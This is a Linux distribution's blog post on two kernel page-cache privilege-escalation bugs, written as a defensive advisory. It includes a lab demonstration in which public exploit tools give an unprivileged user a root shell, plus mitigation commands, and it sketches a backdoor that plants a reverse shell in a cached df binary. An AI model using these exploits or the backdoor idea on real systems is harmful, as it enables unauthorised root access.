<!DOCTYPE html>
<html lang="en-us"><head>
  <!-- Basic Page Needs -->
  <meta charset="utf-8">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  
  <meta name="description" content="Macaroni">
  <meta name="author" content="Geaaru">
  <meta name="generator" content="Hugo 0.110.0">
  
  <!-- Mobile Specific Metas -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Copy Fail and Dirty Frag on Macaroni OS</title>
  <link rel="icon" href="https://www.macaronios.org/images/favicon.ico">

  <!-- Twitter Bootstrs CSS -->
  <link rel="stylesheet" href="https://www.macaronios.org/plugins/bootstrap/bootstrap.min.css">
  <!-- Ionicons Fonts Css -->
  <link rel="stylesheet" href="https://www.macaronios.org/plugins/ionicons/ionicons.min.css">
  <!-- animate css -->
  <link rel="stylesheet" href="https://www.macaronios.org/plugins/animate-css/animate.css">
  <!-- Hero area slider css-->
  <link rel="stylesheet" href="https://www.macaronios.org/plugins/slider/slider.css">
  <!-- slick slider -->
  <link rel="stylesheet" href="https://www.macaronios.org/plugins/slick/slick.css">
  <!-- Fancybox -->
  <link rel="stylesheet" href="https://www.macaronios.org/plugins/facncybox/jquery.fancybox.css">
  <!-- hover -->
  <link rel="stylesheet" href="https://www.macaronios.org/plugins/hover/hover-min.css">
  <!-- template main css file -->
  
  <link rel="stylesheet" href="https://www.macaronios.org/css/style.min.css" media="screen">
  
	<!-- Custom stylesheet - for your changes -->
	
  <link rel="stylesheet" href="https://www.macaronios.org/css/custom.min.css" media="screen">
  
</head><body><section class="top-bar animated-header">
	<div class="container">
		<div class="row">
			<div class="col-lg-12">
				<nav class="navbar navbar-expand-lg navbar-light bg-light">
					<a class="navbar-brand" href="https://www.macaronios.org/">
						<img src="https://www.macaronios.org/images/logo.png" alt="Macaroni OS">
					</a>
					<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navigation"
						aria-controls="navigation" aria-expanded="false" aria-label="Toggle navigation">
						<span class="navbar-toggler-icon"></span>
					</button>

					<div class="collapse navbar-collapse" id="navigation">
						<ul class="navbar-nav ml-auto">
							
							<li class="nav-item">
								<a class="nav-link"
									href="https://www.macaronios.org/">Home</a>
							</li>
							
							
							
							<li class="nav-item">
								<a class="nav-link"
									href="https://www.macaronios.org/contact">Contacts</a>
							</li>
							
							
							
							<li class="nav-item">
								<a class="nav-link"
									href="https://www.macaronios.org/blog">Blog</a>
							</li>
							
							
							
							<li class="nav-item">
								<a class="nav-link"
									href="https://www.macaronios.org/blog/copy-fail/">Copy Fail and Dirty Frag</a>
							</li>
							
							
							
							<li class="nav-item">
								<a class="nav-link"
									href="https://www.macaronios.org/iso/">Download</a>
							</li>
							
							
							
							<li class="nav-item">
								<a class="nav-link"
									href="https://www.macaronios.org/docs">Documentation</a>
							</li>
							
							
						</ul>
					</div>
				</nav>
			</div>
		</div>
	</div>
</section>

<section class="global-page-header">
	<div class="container">
		<div class="row">
			<div class="col-md-12">
				<div class="block">
					<h2>Copy Fail and Dirty Frag on Macaroni OS</h2>
					<div class="portfolio-meta">
						<span>Sunday, May 17, 2026</span>|
						<span> Tags:
							mark, macaroni, security
						</span>
					</div>
				</div>
			</div>
		</div>
	</div>
</section>

<section class="single-post">
	<div class="container">
		<div class="row">
			<div class="col-md-12">
				
				<div class="post-content">
					<p>A little detail about last security issues in Linux world
and the impact in the Macaroni OS world.</p>
<h1 id="copy-fail-on-macaroni-os">Copy Fail on Macaroni OS</h1>
<p>In the last period a lot of important CVEs (CVE-2026-31431, CVE-2026-43500, etc.)
in the Linux world that have shaken all Linux distros.
We speak about <em>Copy Fail</em>, <em>Dirty Frag</em> and derived exploits.</p>
<p>We are surprised that an important mitigation strategy is not yet
been shared and analyzed by the Macaroni OS Team. This strategy doesn&rsquo;t
resolve the security issue but at least give to the OS administrator
a bit more time to organize structured upgrade process.</p>
<p>So, this article wants share what is been discovery in order to be usable
not only in Macaroni OS but in all distros where possible.</p>
<p>We was titubante to share or not this informations, because share them means
also give a new means to attacker but we think that is something interesting
that need to be shared considering that the fixes of the security issues are
now available.</p>
<p>The security issues related to the <em>Copy Fail</em> exploit uses a Linux kernel
bug on page cache that permits root escalation where the files with <em>suid</em>
have readable permissions.</p>
<p>Before enter in the detail we share a real example did in the <code>macaroni/mark-unstable</code> LXD/Incus
container using the Golang <a href="https://github.com/badsectorlabs/copyfail-go">copyfail-go</a>
tool now available in our <code>forensics-kit</code> to show the exploit and the mitigation.</p>
<p>So, the first step is create the testing container:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$&gt; incus launch -p default macaroni:macaroni/mark-unstable test-cve
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>$&gt; incus exec test-cve bash
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>test-cve / $ ego sync
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>test-cve / $ anise repo update
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>test-cve / $ anise i go entities
</span></span><span style="display:flex;"><span>🚀 Luet 0.41.1-geaaru-gc4815024d03bc88794c76a165ba4018ae07296a3 2026-02-21 08:31:25 UTC - go1.25.7
</span></span><span style="display:flex;"><span>🏠 Repository:              geaaru-repo-index Revision:   <span style="color:#ae81ff">15</span> - 2025-01-04 18:10:44 +0000 -00
</span></span><span style="display:flex;"><span>🏠 Repository:               macaroni-commons Revision:  <span style="color:#ae81ff">281</span> - 2025-09-20 16:58:24 +0000 -00
</span></span><span style="display:flex;"><span>🏠 Repository:              macaroni-terragon Revision:  <span style="color:#ae81ff">716</span> - 2026-02-28 08:38:26 +0000 -00
</span></span><span style="display:flex;"><span>🏠 Repository:                           mark Revision:  <span style="color:#ae81ff">118</span> - 2026-05-12 18:01:03 +0000 -00
</span></span><span style="display:flex;"><span>🧠 Solving install tree...
</span></span><span style="display:flex;"><span>🍦 <span style="color:#f92672">[</span>  <span style="color:#ae81ff">1</span> of   2<span style="color:#f92672">]</span> <span style="color:#f92672">[</span>N<span style="color:#f92672">]</span> app-admin/entities::mark                                      - 0.9.3+5
</span></span><span style="display:flex;"><span>🍦 <span style="color:#f92672">[</span>  <span style="color:#ae81ff">2</span> of   2<span style="color:#f92672">]</span> <span style="color:#f92672">[</span>N<span style="color:#f92672">]</span> dev-lang/go::macaroni-terragon                                - 1.25.7
</span></span><span style="display:flex;"><span>💂 Checking <span style="color:#66d9ef">for</span> file conflicts...
</span></span><span style="display:flex;"><span>✔️  No conflicts found <span style="color:#f92672">(</span>executed in <span style="color:#ae81ff">31259</span> µs<span style="color:#f92672">)</span>.
</span></span><span style="display:flex;"><span>Do you want to <span style="color:#66d9ef">continue</span> with this operation? <span style="color:#f92672">[</span>y/N<span style="color:#f92672">]</span>: y
</span></span><span style="display:flex;"><span>🚚 Downloading <span style="color:#ae81ff">2</span> packages...
</span></span><span style="display:flex;"><span>📦 <span style="color:#f92672">[</span>  <span style="color:#ae81ff">1</span> of   2<span style="color:#f92672">]</span> app-admin/entities::mark                                          - 0.9.3+5         <span style="color:#75715e"># downloaded ✔ </span>
</span></span><span style="display:flex;"><span>📦 <span style="color:#f92672">[</span>  <span style="color:#ae81ff">2</span> of   2<span style="color:#f92672">]</span> dev-lang/go::macaroni-terragon                                    - 1.25.7          <span style="color:#75715e"># downloaded ✔                              </span>
</span></span><span style="display:flex;"><span>🧠 Sorting <span style="color:#ae81ff">2</span> packages operations...
</span></span><span style="display:flex;"><span>🍻 Executing <span style="color:#ae81ff">2</span> packages operations...
</span></span><span style="display:flex;"><span>🍰 <span style="color:#f92672">[</span>  <span style="color:#ae81ff">1</span> of   2<span style="color:#f92672">]</span> app-admin/entities::mark                                          - 0.9.3+5         <span style="color:#75715e"># installed ✔ </span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>/usr/lib/go/test/fixedbugs/issue27836.dir/Þfoo.go<span style="color:#f92672">]</span> Ignoring xattr path not supported by the underlying filesystem: operation not supported
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>/usr/lib/go/test/fixedbugs/issue27836.dir/Þmain.go<span style="color:#f92672">]</span> Ignoring xattr path not supported by the underlying filesystem: operation not supported
</span></span><span style="display:flex;"><span>🍰 <span style="color:#f92672">[</span>  <span style="color:#ae81ff">2</span> of   2<span style="color:#f92672">]</span> dev-lang/go::macaroni-terragon                                    - 1.25.7          <span style="color:#75715e"># installed ✔ </span>
</span></span><span style="display:flex;"><span>🎊 All <span style="color:#66d9ef">done</span>.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>test-cve / $ emerge openssh copyfail-go --nodeps -j
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>test-cve / $ useradd -s /bin/bash -m geaaru -g users
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>test-cve / $ entities list users --filter geaaru
</span></span><span style="display:flex;"><span>+----------+--------------------+---------+----------+------+--------------+-----------+
</span></span><span style="display:flex;"><span>| USERNAME | ENCRYPTED PASSWORD | USER ID | GROUP ID | INFO |   HOMEDIR    |   SHELL   |
</span></span><span style="display:flex;"><span>+----------+--------------------+---------+----------+------+--------------+-----------+
</span></span><span style="display:flex;"><span>| geaaru   | x                  |    <span style="color:#ae81ff">1000</span> |      <span style="color:#ae81ff">100</span> |      | /home/geaaru | /bin/bash |
</span></span><span style="display:flex;"><span>+----------+--------------------+---------+----------+------+--------------+-----------+
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>test-cve / $ /etc/init.d/sshd start
</span></span><span style="display:flex;"><span> * Caching service dependencies ...                                                                                                        <span style="color:#f92672">[</span> ok <span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>ssh-keygen: generating new host keys: RSA ECDSA ED25519 
</span></span><span style="display:flex;"><span> * Starting sshd ...
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>test-cve / $ passwd geaaru
</span></span></code></pre></div><p>The <code>copyfail-go</code> could be downloaded from the website, compiled locally or directly
in the container through <code>emerge</code>. We use SSH connection with a unprivileged user <em>geaaru</em> to test
the exploit.</p>
<p>This is what happens in the container:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># The container has ip 172.18.10.54</span>
</span></span><span style="display:flex;"><span>$&gt; ssh geaaru@172.18.10.54
</span></span><span style="display:flex;"><span><span style="color:#f92672">(</span>geaaru@172.18.10.54<span style="color:#f92672">)</span> Password:
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>geaaru@test-cve ~ $  copyfail-go --backup /tmp/su-original
</span></span><span style="display:flex;"><span>2026/05/17 08:10:30 Backup failed: open /bin/su: open /bin/su: permission denied
</span></span></code></pre></div><p>The exploit doesn&rsquo;t work because by default the <code>/bin/su</code> binary has 4711 as
file permissions while a lot of distro install it with 4755.</p>
<p>Here, the dimostration: as root (through <code>incus exec</code> for example), we
change the permissions of the /bin/su binary with 4755:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>test-cve ~ $ ls -l /bin/su
</span></span><span style="display:flex;"><span>-rws--x--x <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">45496</span> Mar <span style="color:#ae81ff">15</span> 19:05 /bin/su
</span></span><span style="display:flex;"><span>test-cve ~ $ chmod a+r /bin/su
</span></span><span style="display:flex;"><span>test-cve ~ $
</span></span></code></pre></div><p>and again we try the exploit:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>geaaru@test-cve ~ $ whoami
</span></span><span style="display:flex;"><span>geaaru
</span></span><span style="display:flex;"><span>geaaru@test-cve ~ $  copyfail-go --backup /tmp/su-original
</span></span><span style="display:flex;"><span>2026/05/17 08:10:52 Backed up /bin/su to /tmp/su-original
</span></span><span style="display:flex;"><span>2026/05/17 08:10:52 Overwriting page cache of /bin/su with <span style="color:#ae81ff">158</span> bytes
</span></span><span style="display:flex;"><span>2026/05/17 08:10:52   ... wrote <span style="color:#ae81ff">4</span> bytes
</span></span><span style="display:flex;"><span>2026/05/17 08:10:52   ... wrote <span style="color:#ae81ff">104</span> bytes
</span></span><span style="display:flex;"><span>2026/05/17 08:10:52   ... wrote <span style="color:#ae81ff">158</span> bytes
</span></span><span style="display:flex;"><span>2026/05/17 08:10:52 Executing payload
</span></span><span style="display:flex;"><span>root@test-cve /home/geaaru $
</span></span><span style="display:flex;"><span>root@test-cve /home/geaaru $ whoami
</span></span><span style="display:flex;"><span>root
</span></span></code></pre></div><p>💥 the exploit works and the user has root privileges!</p>
<p>Any setuid-root binary readable by the user works, so the mitigation
needs to be applied to all binary. This is an example of a simple script usable
for non-macaroniOS systems to mitigate the security issue:</p>
<pre tabindex="0"><code>for bin in passwd chsh chfn mount sudo pkexec; do
  path=$(readlink -f &#34;$(which $bin 2&gt;/dev/null)&#34;)
  [ -n &#34;$path&#34; ] &amp;&amp; echo &#34;fix $path&#34; &amp;&amp; chmod 4711 &#34;$path&#34;
done
</code></pre><p>In conclusion, for <code>copy-fail</code> setting 4711 as permission to all suid-root binary mitigate the exploit.</p>
<h1 id="dirty-frag-on-macaroni-os">Dirty frag on Macaroni OS</h1>
<p>Following the Page-Cache Write described for the Copy Fail exploit there is
another security issue that permits root escalation: <em>Dirty frag</em>.</p>
<p>Using the same container created before, this is what happens
in our MARK container:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>geaaru@test-cve ~ $ git clone https://github.com/V4bel/dirtyfrag.git
</span></span><span style="display:flex;"><span>Cloning into <span style="color:#e6db74">&#39;dirtyfrag&#39;</span>...
</span></span><span style="display:flex;"><span>remote: Enumerating objects: 64, <span style="color:#66d9ef">done</span>.
</span></span><span style="display:flex;"><span>remote: Counting objects: 100% <span style="color:#f92672">(</span>37/37<span style="color:#f92672">)</span>, <span style="color:#66d9ef">done</span>.
</span></span><span style="display:flex;"><span>remote: Compressing objects: 100% <span style="color:#f92672">(</span>23/23<span style="color:#f92672">)</span>, <span style="color:#66d9ef">done</span>.
</span></span><span style="display:flex;"><span>remote: Total <span style="color:#ae81ff">64</span> <span style="color:#f92672">(</span>delta 18<span style="color:#f92672">)</span>, reused <span style="color:#ae81ff">20</span> <span style="color:#f92672">(</span>delta 14<span style="color:#f92672">)</span>, pack-reused <span style="color:#ae81ff">27</span> <span style="color:#f92672">(</span>from 1<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>Receiving objects: 100% <span style="color:#f92672">(</span>64/64<span style="color:#f92672">)</span>, 5.83 MiB | 25.29 MiB/s, <span style="color:#66d9ef">done</span>.
</span></span><span style="display:flex;"><span>Resolving deltas: 100% <span style="color:#f92672">(</span>23/23<span style="color:#f92672">)</span>, <span style="color:#66d9ef">done</span>.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>geaaru@test-cve ~ $ cd dirtyfrag <span style="color:#f92672">&amp;&amp;</span> gcc -O0 -Wall -o exp exp.c -lutil
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>geaaru@test-cve ~/dirtyfrag $ ./exp
</span></span><span style="display:flex;"><span>dirtyfrag: failed <span style="color:#f92672">(</span>rc<span style="color:#f92672">=</span>0<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>Before describe the reason we suggest to use the mitigation process
already described in Internet:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$&gt; sh -c <span style="color:#e6db74">&#34;printf &#39;install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n&#39; &gt; /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2&gt;/dev/null; true&#34;</span>
</span></span></code></pre></div><p>My special thanks to our developer <code>cuantar</code> for this precise description
of the exploit and the analysis that I report.</p>
<p>In the test program there are two exploits:</p>
<ol>
<li>
<p>try to poison the page cache version of <em>su</em> so that it starts a root shell, by exploiting the suid root.
This fails on Macaroni due to our o-r permissions on suid root binaries.</p>
</li>
<li>
<p>try to poison the page cache version of <code>/etc/passwd</code> to re-write the root entry so that root no longer has a shadow password,
and make the password blank. It fails on Macaroni because our root line isn&rsquo;t at the top of the file, and the GECOS field doesn&rsquo;t just
say root like the test program assumes. The <code>/etc/passwd</code> is generated by <code>entities</code> tool and the root user is created later
in the <code>markdev-kit metro</code> process.
Related to this, since we use <code>wheel</code> group for <code>su</code> automatically in our PAM configuration, that&rsquo;s another reason the <code>/etc/passwd</code>
file modification doesn&rsquo;t work on Macaroni.  Even if the attacker succeeds at setting the password for root to be blank, he can&rsquo;t use the
regular unmodified <code>su</code> to switch to it unless he&rsquo;s in wheel group but we&rsquo;re still vulnerable to an attack on a different binary like <code>df</code>.</p>
</li>
</ol>
<p>It&rsquo;s important to understand that point 2 is still a problem on Macaroni. A clever attacker with local access can
just tailor the exploit to the target system, instead of hard-coding wrong strings in it.</p>
<p>Although point 1 fails on Macaroni to get root, the attacker could still use the same procedure to modify some other binary,
like <code>df</code>, and wait for an admin to log in as root and run it. The exploit allows to change the cached version of a binary into
something else, by replacing the beginning of it with an ELF executable.  Suppose instead of a shell, the executable spawns a child
process that makes an outgoing connection to a server the attacker controls, connects it to a shell, and then disowns the child;
when the admin logs in as root and runs df, a backdoor will be created.</p>
<p>So, we are still vulnerable to point 1 and 2 in the hands of a clever attacker but we have a good temporary mitigation until the
new kernel will be upgraded.</p>
<p>Again, my special thanks to <code>cuantar</code> and <code>coffnix</code> for monitoring security vulnerabilities and share details.</p>
<p>We hope that these informations will help other distro and OS administrator in their jobs.</p>
<h1 id="phoenix---wip">Phoenix - WIP</h1>
<p>We are sorry for this long waiting in the new release of Phoenix but we have really tons of upgraded
related to the continue improves done in MARK that requires a lot of testing and fix before been released.</p>
<p>Between the upgrades these some important new features incoming:</p>
<pre><code>- QT 6.10
- Gnome 48/49 (an hybrid release that works yet with OpenRC)
- LXQT 2.3.3
- KDE 6.22.0
</code></pre>
<p>Stay tuned!</p>
<p>Enjoy!</p>
<h1 id="thanks">Thanks</h1>
<p>Many thanks to all Developers and Contributors that are the sap of all this and to all
people that helps us with testing and donations.</p>
<p>A <a href="/docs/mark/contributors/">Became a Contributor</a> section is available in our
website and we hope to have a lot of contributors soon.</p>
<div style="text-align: center; margin-bottom: 20px">
<img src="../../images/macaroni_wait4you.png" width="300">
</div>
<p>We waiting for you in our <a href="https://discord.gg/AMuVCRZEvG">Discord Server</a>!</p>
<h1 id="support-us">Support Us</h1>
<p>Any user that wants to support our work for Macaroni could do this through the
Github <a href="https://github.com/sponsors/geaaru">Sponsor</a> or through the
<a href="https://liberapay.com/geaaru/">Liberay</a> page.</p>

				</div>
			</div>
		</div>
	</div>
</section>


<!-- Call To Action Section Start -->
<section id="call-to-action">
  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <div class="block">
          <h2 class="title wow fadeInDown" data-wow-delay=".3s"
            data-wow-duration="500ms">WHAT DO YOU THINK?</h1>
            <p class="wow fadeInDown" data-wow-delay=".5s" data-wow-duration="500ms">
              Do you think I could integrate more features?</p>
            <a href="https://www.macaronios.org/contact" class="btn btn-default btn-contact wow fadeInDown"
              data-wow-delay=".7s" data-wow-duration="500ms">Contact us</a>
        </div>
      </div>
    </div>
  </div>
</section>
<!-- Call To Action Section End -->



<!-- Footer Section Start -->
<footer id="footer">
  <div class="container">
    <div class="row content-justify-between">
      <div class="col-md-8 col-12 text-center text-lg-left text-md-left">
        <p class="copyright">Copyright:
          <span>
            <script>
              document.write(new Date().getFullYear())
            </script>
          </span> Daniele Rondina All Rights Reserved
        </p>
      </div>
      <div class="col-md-4 col-12">
        <!-- Social Media -->
        <ul class="social text-center text-md-right text-lg-right">
          
          <li><a href="https://github.com/macaroni-os"><i class="ion-social-github"></i></a></li>
          
          <li><a href="https://discord.gg/AMuVCRZEvG"><i class="ion-chatbox"></i></a></li>
          
        </ul>
      </div>
    </div>
  </div>
</footer>
<!-- footer section end -->

<!-- jquery -->
<script src="https://www.macaronios.org/plugins/jQurey/jquery.min.js"></script>
<!-- slick slider -->
<script src="https://www.macaronios.org/plugins/slick/slick.min.js"></script>
<!-- bootstrap js -->
<script src="https://www.macaronios.org/plugins/bootstrap/bootstrap.min.js"></script>
<!-- wow js -->
<script src="https://www.macaronios.org/plugins/wow-js/wow.min.js"></script>
<!-- slider js -->
<script src="https://www.macaronios.org/plugins/slider/slider.js"></script>
<!-- Fancybox -->
<script src="https://www.macaronios.org/plugins/facncybox/jquery.fancybox.js"></script>
<!-- template main js -->

<script src="https://www.macaronios.org/js/script.min.js"></script>
<!-- google analitycs -->
<script>
  (function (i, s, o, g, r, a, m) {
    i['GoogleAnalyticsObject'] = r;
    i[r] = i[r] || function () {
      (i[r].q = i[r].q || []).push(arguments)
    }, i[r].l = 1 * new Date();
    a = s.createElement(o),
      m = s.getElementsByTagName(o)[0];
    a.async = 1;
    a.src = g;
    m.parentNode.insertBefore(a, m)
  })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');
  ga('create', 'Your ID', 'auto');
  ga('send', 'pageview');
</script>
</body>

</html>